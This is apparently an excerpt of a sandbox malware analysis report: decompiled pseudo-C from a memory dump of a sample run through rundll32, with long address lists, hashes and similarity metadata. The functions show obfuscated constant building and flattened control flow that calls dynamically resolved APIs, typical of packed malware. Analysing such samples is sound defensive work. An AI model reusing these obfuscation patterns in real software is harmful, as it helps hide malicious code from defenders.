                                                                                                                      					E00173BF8(_v28, __eflags, E0017AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
                                                                                                                      					E0017AE03(_v128, _v36, _v120, _t353);
                                                                                                                      					_t427 = _t427 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					goto L27;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00171c32
                                                                                                                      0x00171c3c
                                                                                                                      0x00171c46
                                                                                                                      0x00171c50
                                                                                                                      0x00171c5c
                                                                                                                      0x00171c5f
                                                                                                                      0x00171c6a
                                                                                                                      0x00171c6d
                                                                                                                      0x00171c74
                                                                                                                      0x00171c7b
                                                                                                                      0x00171c7f
                                                                                                                      0x00171c86
                                                                                                                      0x00171c8d
                                                                                                                      0x00171c94
                                                                                                                      0x00171c9b
                                                                                                                      0x00171ca2
                                                                                                                      0x00171ca9
                                                                                                                      0x00171cb0
                                                                                                                      0x00171cb7
                                                                                                                      0x00171cbe
                                                                                                                      0x00171cc5
                                                                                                                      0x00171cc9
                                                                                                                      0x00171cd0
                                                                                                                      0x00171cda
                                                                                                                      0x00171ce6
                                                                                                                      0x00171cf0
                                                                                                                      0x00171cf7
                                                                                                                      0x00171cfe
                                                                                                                      0x00171d05
                                                                                                                      0x00171d12
                                                                                                                      0x00171d13
                                                                                                                      0x00171d16
                                                                                                                      0x00171d1d
                                                                                                                      0x00171d24
                                                                                                                      0x00171d28
                                                                                                                      0x00171d2f
                                                                                                                      0x00171d36
                                                                                                                      0x00171d42
                                                                                                                      0x00171d45
                                                                                                                      0x00171d48
                                                                                                                      0x00171d4f
                                                                                                                      0x00171d56
                                                                                                                      0x00171d5d
                                                                                                                      0x00171d64
                                                                                                                      0x00171d6b
                                                                                                                      0x00171d6f
                                                                                                                      0x00171d76
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d80
                                                                                                                      0x00171d92
                                                                                                                      0x00171f11
                                                                                                                      0x00171f17
                                                                                                                      0x00000000
                                                                                                                      0x00171f17
                                                                                                                      0x00171d9e
                                                                                                                      0x00171e2d
                                                                                                                      0x00171e33
                                                                                                                      0x00171efd
                                                                                                                      0x00171f04
                                                                                                                      0x00171f06
                                                                                                                      0x00171de9
                                                                                                                      0x00171de9
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d7f
                                                                                                                      0x00171e39
                                                                                                                      0x00171e39
                                                                                                                      0x00171e40
                                                                                                                      0x00171e69
                                                                                                                      0x00171e69
                                                                                                                      0x00171e6d
                                                                                                                      0x00171e6f
                                                                                                                      0x00171e72
                                                                                                                      0x00171e7e
                                                                                                                      0x00171ead
                                                                                                                      0x00171ec7
                                                                                                                      0x00171ece
                                                                                                                      0x00171ed3
                                                                                                                      0x00171ee0
                                                                                                                      0x00171ee9
                                                                                                                      0x00171ee9
                                                                                                                      0x00171e42
                                                                                                                      0x00171e42
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e4c
                                                                                                                      0x00171e53
                                                                                                                      0x00000000
                                                                                                                      0x00171e55
                                                                                                                      0x00171e55
                                                                                                                      0x00171e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171e5d
                                                                                                                      0x00171e53
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e33
                                                                                                                      0x00171daa
                                                                                                                      0x00171db2
                                                                                                                      0x00000000
                                                                                                                      0x00171f91
                                                                                                                      0x00171dbe
                                                                                                                      0x00171f70
                                                                                                                      0x00171f70
                                                                                                                      0x00171f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dd6
                                                                                                                      0x00171de1
                                                                                                                      0x00171de3
                                                                                                                      0x00000000
                                                                                                                      0x00171de3
                                                                                                                      0x00171dbe
                                                                                                                      0x00171e0d
                                                                                                                      0x00171e12
                                                                                                                      0x00171e14
                                                                                                                      0x00171e17
                                                                                                                      0x00171e1a
                                                                                                                      0x00171e20
                                                                                                                      0x00000000
                                                                                                                      0x00171e20
                                                                                                                      0x00171f9a
                                                                                                                      0x00000000
                                                                                                                      0x00171f9a
                                                                                                                      0x00171f21
                                                                                                                      0x00171f24
                                                                                                                      0x00171f2d
                                                                                                                      0x00171f51
                                                                                                                      0x00171f60
                                                                                                                      0x00171f65
                                                                                                                      0x00171f68
                                                                                                                      0x00171f6f
                                                                                                                      0x00000000
                                                                                                                      0x00171f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: f2affc7224f7d2d6baecfe46121695531feeaf4051003563cda7903569105a46
                                                                                                                      • Instruction ID: 460165429ac6f8ed2f28d4a18115b7ab2c306a2a07bbfc1621bb8e7d94b284ab
                                                                                                                      • Opcode Fuzzy Hash: f2affc7224f7d2d6baecfe46121695531feeaf4051003563cda7903569105a46
                                                                                                                      • Instruction Fuzzy Hash: AB022471D0021DEBCF29CFE5C98A9DEBBB1FB44314F208199D51ABA260D7B44A89CF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00182753(intOrPtr* __ecx) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				intOrPtr _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				unsigned int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				intOrPtr* _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				unsigned int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t246;
                                                                                                                      				intOrPtr _t251;
                                                                                                                      				intOrPtr* _t252;
                                                                                                                      				void* _t253;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				void* _t281;
                                                                                                                      				void* _t285;
                                                                                                                      				signed int* _t286;
                                                                                                                      
                                                                                                                      				_t252 = __ecx;
                                                                                                                      				_t286 =  &_v232;
                                                                                                                      				_v172 = __ecx;
                                                                                                                      				_v136 = _v136 & 0x00000000;
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_v140 = 0x217d3d;
                                                                                                                      				_v176 = 0xa426f0;
                                                                                                                      				_v176 = _v176 + 0xffffeb7e;
                                                                                                                      				_v176 = _v176 ^ 0xed8cc375;
                                                                                                                      				_v176 = _v176 ^ 0xed273dc0;
                                                                                                                      				_v220 = 0x3129fd;
                                                                                                                      				_v220 = _v220 + 0xffff6602;
                                                                                                                      				_v220 = _v220 + 0xfffff7e7;
                                                                                                                      				_v220 = _v220 >> 7;
                                                                                                                      				_v220 = _v220 ^ 0x000cbf49;
                                                                                                                      				_v212 = 0x151fab;
                                                                                                                      				_v212 = _v212 + 0x7196;
                                                                                                                      				_v212 = _v212 + 0xffffb9ae;
                                                                                                                      				_v212 = _v212 * 0x34;
                                                                                                                      				_t281 = 0x42637f8;
                                                                                                                      				_v212 = _v212 ^ 0x045541a5;
                                                                                                                      				_v148 = 0x54413c;
                                                                                                                      				_v148 = _v148 << 5;
                                                                                                                      				_v148 = _v148 ^ 0x0a8ad6a3;
                                                                                                                      				_v180 = 0x7a2f9c;
                                                                                                                      				_t276 = 0x52;
                                                                                                                      				_v180 = _v180 / _t276;
                                                                                                                      				_t277 = 0x3b;
                                                                                                                      				_v180 = _v180 * 0x43;
                                                                                                                      				_v180 = _v180 ^ 0x006060ee;
                                                                                                                      				_v144 = 0xa6782c;
                                                                                                                      				_v144 = _v144 + 0x5cb5;
                                                                                                                      				_v144 = _v144 ^ 0x00a488c7;
                                                                                                                      				_v228 = 0xec9e27;
                                                                                                                      				_v228 = _v228 >> 0x10;
                                                                                                                      				_v228 = _v228 * 0x57;
                                                                                                                      				_v228 = _v228 * 0x1a;
                                                                                                                      				_v228 = _v228 ^ 0x00091e6b;
                                                                                                                      				_v164 = 0xea1f52;
                                                                                                                      				_v164 = _v164 >> 6;
                                                                                                                      				_v164 = _v164 ^ 0x000e8f9b;
                                                                                                                      				_v168 = 0xaa796a;
                                                                                                                      				_v168 = _v168 << 9;
                                                                                                                      				_v168 = _v168 << 1;
                                                                                                                      				_v168 = _v168 ^ 0xa9e52790;
                                                                                                                      				_v232 = 0xe004fa;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x9f2834c7;
                                                                                                                      				_v232 = _v232 << 7;
                                                                                                                      				_v232 = _v232 ^ 0xac158818;
                                                                                                                      				_v152 = 0x480a21;
                                                                                                                      				_v152 = _v152 >> 0xa;
                                                                                                                      				_v152 = _v152 ^ 0x00051613;
                                                                                                                      				_v192 = 0xe4ba17;
                                                                                                                      				_v192 = _v192 << 0xc;
                                                                                                                      				_v192 = _v192 + 0xffffee51;
                                                                                                                      				_v192 = _v192 * 0x26;
                                                                                                                      				_v192 = _v192 ^ 0x39f6006f;
                                                                                                                      				_v184 = 0xc14080;
                                                                                                                      				_v184 = _v184 + 0xffffa387;
                                                                                                                      				_v184 = _v184 / _t277;
                                                                                                                      				_v184 = _v184 ^ 0x000e78de;
                                                                                                                      				_v224 = 0xaafc1b;
                                                                                                                      				_v224 = _v224 << 8;
                                                                                                                      				_v224 = _v224 | 0xe68448c7;
                                                                                                                      				_v224 = _v224 + 0xffffb5fa;
                                                                                                                      				_v224 = _v224 ^ 0xeef4be14;
                                                                                                                      				_v208 = 0x4cb450;
                                                                                                                      				_v208 = _v208 | 0x41a678b0;
                                                                                                                      				_v208 = _v208 << 3;
                                                                                                                      				_v208 = _v208 + 0xffff1daa;
                                                                                                                      				_v208 = _v208 ^ 0x0f7f4e1f;
                                                                                                                      				_v156 = 0xa14600;
                                                                                                                      				_v156 = _v156 | 0x4ac9cb75;
                                                                                                                      				_v156 = _v156 ^ 0x4ae3fffe;
                                                                                                                      				_v200 = 0x80f125;
                                                                                                                      				_v200 = _v200 >> 6;
                                                                                                                      				_v200 = _v200 + 0xa5;
                                                                                                                      				_v200 = _v200 + 0x7126;
                                                                                                                      				_v200 = _v200 ^ 0x0003bf81;
                                                                                                                      				_v216 = 0xe3f3ee;
                                                                                                                      				_v216 = _v216 ^ 0x7171deb4;
                                                                                                                      				_v216 = _v216 ^ 0xe1685078;
                                                                                                                      				_v216 = _v216 >> 0xf;
                                                                                                                      				_v216 = _v216 ^ 0x000d439d;
                                                                                                                      				_v188 = 0x120f5;
                                                                                                                      				_v188 = _v188 + 0x596b;
                                                                                                                      				_t152 =  &_v188; // 0x596b
                                                                                                                      				_t278 = 0x32;
                                                                                                                      				_v188 =  *_t152 * 0x15;
                                                                                                                      				_t251 = _v172;
                                                                                                                      				_v188 = _v188 / _t278;
                                                                                                                      				_v188 = _v188 ^ 0x0000a7a1;
                                                                                                                      				_v160 = 0xd711e5;
                                                                                                                      				_v160 = _v160 | 0x35682df8;
                                                                                                                      				_v160 = _v160 ^ 0x35f32f5b;
                                                                                                                      				_v196 = 0xd874e4;
                                                                                                                      				_t279 = 0x21;
                                                                                                                      				_t280 = _v172;
                                                                                                                      				_v196 = _v196 / _t279;
                                                                                                                      				_v196 = _v196 + 0xffffe729;
                                                                                                                      				_v196 = _v196 + 0xffff68b4;
                                                                                                                      				_v196 = _v196 ^ 0x0004b076;
                                                                                                                      				_v204 = 0xe57f56;
                                                                                                                      				_v204 = _v204 ^ 0xa54f8096;
                                                                                                                      				_v204 = _v204 + 0xc8c2;
                                                                                                                      				_v204 = _v204 + 0xffffef22;
                                                                                                                      				_v204 = _v204 ^ 0xa5a4489c;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t233 = 0xe70005f;
                                                                                                                      					do {
                                                                                                                      						while(_t281 != 0x42637f8) {
                                                                                                                      							if(_t281 == 0x44a4c11) {
                                                                                                                      								_t285 = E0017EF71(1, 0x10);
                                                                                                                      								_push(_t285);
                                                                                                                      								_push(_v148);
                                                                                                                      								_push( &_v128);
                                                                                                                      								_t253 = 0xb;
                                                                                                                      								E00175A07(_t253, _v212);
                                                                                                                      								_t286 =  &(_t286[5]);
                                                                                                                      								_t281 = 0x5b07f93;
                                                                                                                      								goto L9;
                                                                                                                      							} else {
                                                                                                                      								if(_t281 == 0x5b07f93) {
                                                                                                                      									_t280 = E0018C9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
                                                                                                                      									_t286 =  &(_t286[4]);
                                                                                                                      									__eflags = _t280;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t281 = 0xc9ed25e;
                                                                                                                      										goto L9;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t281 == 0xc9ed25e) {
                                                                                                                      										_t285 = 0x4000;
                                                                                                                      										_push(_t252);
                                                                                                                      										_push(_t252);
                                                                                                                      										_t251 = E00183512(0x4000);
                                                                                                                      										__eflags = _t251;
                                                                                                                      										_t233 = 0xe70005f;
                                                                                                                      										_t252 = _v172;
                                                                                                                      										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t281 == 0xdfcaecd) {
                                                                                                                      											E001768DE(_v188, _v160, _v196, _v204, _t280);
                                                                                                                      										} else {
                                                                                                                      											_t295 = _t281 - _t233;
                                                                                                                      											if(_t281 != _t233) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v208);
                                                                                                                      												_push(_v224);
                                                                                                                      												_push(0x17136c);
                                                                                                                      												_t246 = E0017AB66(_v192, _v184, _t295);
                                                                                                                      												_push(_t280);
                                                                                                                      												_push( &_v128);
                                                                                                                      												_push(_t246);
                                                                                                                      												_push(_t285);
                                                                                                                      												_push(_t251);
                                                                                                                      												 *((intOrPtr*)(E0017C1DC(_v192, 0xbf7d08b0, 0xef)))();
                                                                                                                      												E0017AE03(_v156, _v200, _v216, _t246);
                                                                                                                      												_t286 =  &(_t286[0xa]);
                                                                                                                      												_t281 = 0xdfcaecd;
                                                                                                                      												L9:
                                                                                                                      												_t252 = _v172;
                                                                                                                      												goto L1;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t251;
                                                                                                                      						}
                                                                                                                      						_t281 = 0x44a4c11;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t281 - 0xefc9c40;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}











































                                                                                                                      0x0018297f
                                                                                                                      0x00182984
                                                                                                                      0x0018298c
                                                                                                                      0x00182994
                                                                                                                      0x0018299c
                                                                                                                      0x001829a4
                                                                                                                      0x001829ac
                                                                                                                      0x001829b4
                                                                                                                      0x001829b9
                                                                                                                      0x001829c1
                                                                                                                      0x001829c9
                                                                                                                      0x001829d1
                                                                                                                      0x001829d8
                                                                                                                      0x001829df
                                                                                                                      0x001829eb
                                                                                                                      0x001829ef
                                                                                                                      0x001829f3
                                                                                                                      0x001829fb
                                                                                                                      0x00182a03
                                                                                                                      0x00182a0b
                                                                                                                      0x00182a13
                                                                                                                      0x00182a1f
                                                                                                                      0x00182a22
                                                                                                                      0x00182a26
                                                                                                                      0x00182a2a
                                                                                                                      0x00182a32
                                                                                                                      0x00182a3a
                                                                                                                      0x00182a42
                                                                                                                      0x00182a4a
                                                                                                                      0x00182a52
                                                                                                                      0x00182a5a
                                                                                                                      0x00182a62
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6f
                                                                                                                      0x00182a6f
                                                                                                                      0x00182a81
                                                                                                                      0x00182b7d
                                                                                                                      0x00182b86
                                                                                                                      0x00182b87
                                                                                                                      0x00182b8f
                                                                                                                      0x00182b92
                                                                                                                      0x00182b93
                                                                                                                      0x00182b98
                                                                                                                      0x00182b9b
                                                                                                                      0x00000000
                                                                                                                      0x00182a87
                                                                                                                      0x00182a8d
                                                                                                                      0x00182b5c
                                                                                                                      0x00182b5e
                                                                                                                      0x00182b61
                                                                                                                      0x00182b63
                                                                                                                      0x00182b65
                                                                                                                      0x00000000
                                                                                                                      0x00182b65
                                                                                                                      0x00182a93
                                                                                                                      0x00182a99
                                                                                                                      0x00182b10
                                                                                                                      0x00182b1d
                                                                                                                      0x00182b1e
                                                                                                                      0x00182b26
                                                                                                                      0x00182b2e
                                                                                                                      0x00182b30
                                                                                                                      0x00182b36
                                                                                                                      0x00182b3a
                                                                                                                      0x00000000
                                                                                                                      0x00182a9b
                                                                                                                      0x00182aa1
                                                                                                                      0x00182bc9
                                                                                                                      0x00182aa7
                                                                                                                      0x00182aa7
                                                                                                                      0x00182aa9
                                                                                                                      0x00000000
                                                                                                                      0x00182aaf
                                                                                                                      0x00182aaf
                                                                                                                      0x00182ab3
                                                                                                                      0x00182abf
                                                                                                                      0x00182ac4
                                                                                                                      0x00182ad7
                                                                                                                      0x00182ad8
                                                                                                                      0x00182ad9
                                                                                                                      0x00182ada
                                                                                                                      0x00182adb
                                                                                                                      0x00182ae7
                                                                                                                      0x00182af6
                                                                                                                      0x00182afb
                                                                                                                      0x00182afe
                                                                                                                      0x00182b03
                                                                                                                      0x00182b03
                                                                                                                      0x00000000
                                                                                                                      0x00182b03
                                                                                                                      0x00182aa9
                                                                                                                      0x00182aa1
                                                                                                                      0x00182a99
                                                                                                                      0x00182a8d
                                                                                                                      0x00182bd4
                                                                                                                      0x00182bdd
                                                                                                                      0x00182bdd
                                                                                                                      0x00182ba5
                                                                                                                      0x00182baa
                                                                                                                      0x00182baa
                                                                                                                      0x00182baa
                                                                                                                      0x00000000
                                                                                                                      0x00182bb6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: 4936fcd2adc2b69476b9b9001cff313eb7d2a4650d0152a86a5d41ab8517a072
                                                                                                                      • Instruction ID: 8fe95804425604098e56fdfdc0704d50441708f2259852f2f39e5b8415a61c5d
                                                                                                                      • Opcode Fuzzy Hash: 4936fcd2adc2b69476b9b9001cff313eb7d2a4650d0152a86a5d41ab8517a072
                                                                                                                      • Instruction Fuzzy Hash: 03B121725083809FD358DE29C48A50BFBF0BBD4758F104A2DF5A696260D3B5DA49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018A429(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				intOrPtr _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t488;
                                                                                                                      				signed int _t491;
                                                                                                                      				signed int _t492;
                                                                                                                      				signed int _t493;
                                                                                                                      				signed int _t494;
                                                                                                                      				signed int _t495;
                                                                                                                      				signed int _t496;
                                                                                                                      				signed int _t497;
                                                                                                                      				signed int _t498;
                                                                                                                      				signed int _t499;
                                                                                                                      				signed int _t500;
                                                                                                                      				signed int _t503;
                                                                                                                      				void* _t552;
                                                                                                                      				void* _t553;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int* _t558;
                                                                                                                      
                                                                                                                      				_t558 =  &_v2792;
                                                                                                                      				_v2604 = _v2604 & 0x00000000;
                                                                                                                      				_v2616 = 0xa4b63e;
                                                                                                                      				_v2612 = 0x1047f0;
                                                                                                                      				_v2608 = 0x380de4;
                                                                                                                      				_v2640 = 0x3665dd;
                                                                                                                      				_v2640 = _v2640 >> 1;
                                                                                                                      				_v2640 = _v2640 ^ 0x001b32c7;
                                                                                                                      				_v2748 = 0xd91e11;
                                                                                                                      				_v2748 = _v2748 + 0xffffc541;
                                                                                                                      				_v2748 = _v2748 ^ 0x51c605c4;
                                                                                                                      				_v2748 = _v2748 ^ 0x6a8dd901;
                                                                                                                      				_v2748 = _v2748 ^ 0x3b9e7a9b;
                                                                                                                      				_v2788 = 0x157b94;
                                                                                                                      				_v2788 = _v2788 + 0xffffeadc;
                                                                                                                      				_v2788 = _v2788 >> 0x10;
                                                                                                                      				_v2788 = _v2788 + 0xffff73d6;
                                                                                                                      				_v2788 = _v2788 ^ 0xffff2eba;
                                                                                                                      				_v2716 = 0x64154b;
                                                                                                                      				_v2716 = _v2716 * 0x75;
                                                                                                                      				_t552 = __ecx;
                                                                                                                      				_v2716 = _v2716 << 3;
                                                                                                                      				_t553 = 0x422d362;
                                                                                                                      				_v2716 = _v2716 ^ 0x6de46b99;
                                                                                                                      				_v2720 = 0x9c58cd;
                                                                                                                      				_v2720 = _v2720 + 0xffff09d2;
                                                                                                                      				_v2720 = _v2720 + 0x2545;
                                                                                                                      				_v2720 = _v2720 ^ 0x00913431;
                                                                                                                      				_v2688 = 0xaeb597;
                                                                                                                      				_v2688 = _v2688 ^ 0x90c85188;
                                                                                                                      				_t556 = 0x69;
                                                                                                                      				_v2688 = _v2688 / _t556;
                                                                                                                      				_v2688 = _v2688 ^ 0x016f083f;
                                                                                                                      				_v2624 = 0xf336a7;
                                                                                                                      				_v2624 = _v2624 ^ 0x0756d720;
                                                                                                                      				_v2624 = _v2624 ^ 0x07af532c;
                                                                                                                      				_v2780 = 0x2eb910;
                                                                                                                      				_v2780 = _v2780 + 0xffff6a34;
                                                                                                                      				_v2780 = _v2780 + 0x3a3b;
                                                                                                                      				_v2780 = _v2780 >> 0xc;
                                                                                                                      				_v2780 = _v2780 ^ 0x00093eda;
                                                                                                                      				_v2696 = 0x95c01d;
                                                                                                                      				_v2696 = _v2696 ^ 0xd4af9b47;
                                                                                                                      				_t488 = 0x43;
                                                                                                                      				_v2696 = _v2696 * 0x38;
                                                                                                                      				_v2696 = _v2696 ^ 0x6cc3512a;
                                                                                                                      				_v2756 = 0x7bda8f;
                                                                                                                      				_v2756 = _v2756 >> 4;
                                                                                                                      				_v2756 = _v2756 + 0xffff790e;
                                                                                                                      				_v2756 = _v2756 << 1;
                                                                                                                      				_v2756 = _v2756 ^ 0x00077f92;
                                                                                                                      				_v2672 = 0xbe500a;
                                                                                                                      				_v2672 = _v2672 * 0x69;
                                                                                                                      				_v2672 = _v2672 ^ 0x4e081773;
                                                                                                                      				_v2664 = 0xf21545;
                                                                                                                      				_v2664 = _v2664 << 1;
                                                                                                                      				_v2664 = _v2664 ^ 0x01e0a5ee;
                                                                                                                      				_v2712 = 0x4aa3d0;
                                                                                                                      				_v2712 = _v2712 / _t488;
                                                                                                                      				_v2712 = _v2712 + 0xffffba00;
                                                                                                                      				_v2712 = _v2712 ^ 0x00096837;
                                                                                                                      				_v2704 = 0x6e8851;
                                                                                                                      				_v2704 = _v2704 * 0x4c;
                                                                                                                      				_v2704 = _v2704 ^ 0x74892048;
                                                                                                                      				_v2704 = _v2704 ^ 0x54501412;
                                                                                                                      				_v2740 = 0x9704ff;
                                                                                                                      				_t491 = 0x4c;
                                                                                                                      				_v2740 = _v2740 / _t491;
                                                                                                                      				_v2740 = _v2740 + 0xffff50cb;
                                                                                                                      				_v2740 = _v2740 / _t556;
                                                                                                                      				_v2740 = _v2740 ^ 0x0004486b;
                                                                                                                      				_v2772 = 0xa165e2;
                                                                                                                      				_t492 = 0x36;
                                                                                                                      				_v2772 = _v2772 / _t492;
                                                                                                                      				_v2772 = _v2772 ^ 0x6089554b;
                                                                                                                      				_t493 = 0x29;
                                                                                                                      				_v2772 = _v2772 * 0x30;
                                                                                                                      				_v2772 = _v2772 ^ 0x1a2b5067;
                                                                                                                      				_v2680 = 0xe9519d;
                                                                                                                      				_v2680 = _v2680 / _t493;
                                                                                                                      				_v2680 = _v2680 | 0xd8f73a5a;
                                                                                                                      				_v2680 = _v2680 ^ 0xd8f0b3ca;
                                                                                                                      				_v2656 = 0x3fe983;
                                                                                                                      				_t494 = 0x30;
                                                                                                                      				_v2656 = _v2656 / _t494;
                                                                                                                      				_v2656 = _v2656 ^ 0x00046ac2;
                                                                                                                      				_v2628 = 0x33b4cd;
                                                                                                                      				_t495 = 0x11;
                                                                                                                      				_v2628 = _v2628 / _t495;
                                                                                                                      				_v2628 = _v2628 ^ 0x00043067;
                                                                                                                      				_v2648 = 0x47920b;
                                                                                                                      				_t496 = 0x1a;
                                                                                                                      				_v2648 = _v2648 * 7;
                                                                                                                      				_v2648 = _v2648 ^ 0x01f55662;
                                                                                                                      				_v2636 = 0xc27dad;
                                                                                                                      				_v2636 = _v2636 | 0xeea2905e;
                                                                                                                      				_v2636 = _v2636 ^ 0xeee70f52;
                                                                                                                      				_v2792 = 0xce83a7;
                                                                                                                      				_v2792 = _v2792 | 0x91097b86;
                                                                                                                      				_v2792 = _v2792 >> 0x10;
                                                                                                                      				_v2792 = _v2792 + 0xfffff873;
                                                                                                                      				_v2792 = _v2792 ^ 0x000d88b9;
                                                                                                                      				_v2764 = 0x687458;
                                                                                                                      				_v2764 = _v2764 + 0xffff3130;
                                                                                                                      				_v2764 = _v2764 / _t488;
                                                                                                                      				_v2764 = _v2764 | 0xf90624cd;
                                                                                                                      				_v2764 = _v2764 ^ 0xf90653f7;
                                                                                                                      				_v2784 = 0xf92951;
                                                                                                                      				_v2784 = _v2784 + 0xffff51be;
                                                                                                                      				_v2784 = _v2784 ^ 0x8ae9764d;
                                                                                                                      				_v2784 = _v2784 + 0x99a0;
                                                                                                                      				_v2784 = _v2784 ^ 0x8a16d001;
                                                                                                                      				_v2732 = 0xd5993f;
                                                                                                                      				_v2732 = _v2732 / _t496;
                                                                                                                      				_v2732 = _v2732 + 0xffff4990;
                                                                                                                      				_v2732 = _v2732 ^ 0x000978e2;
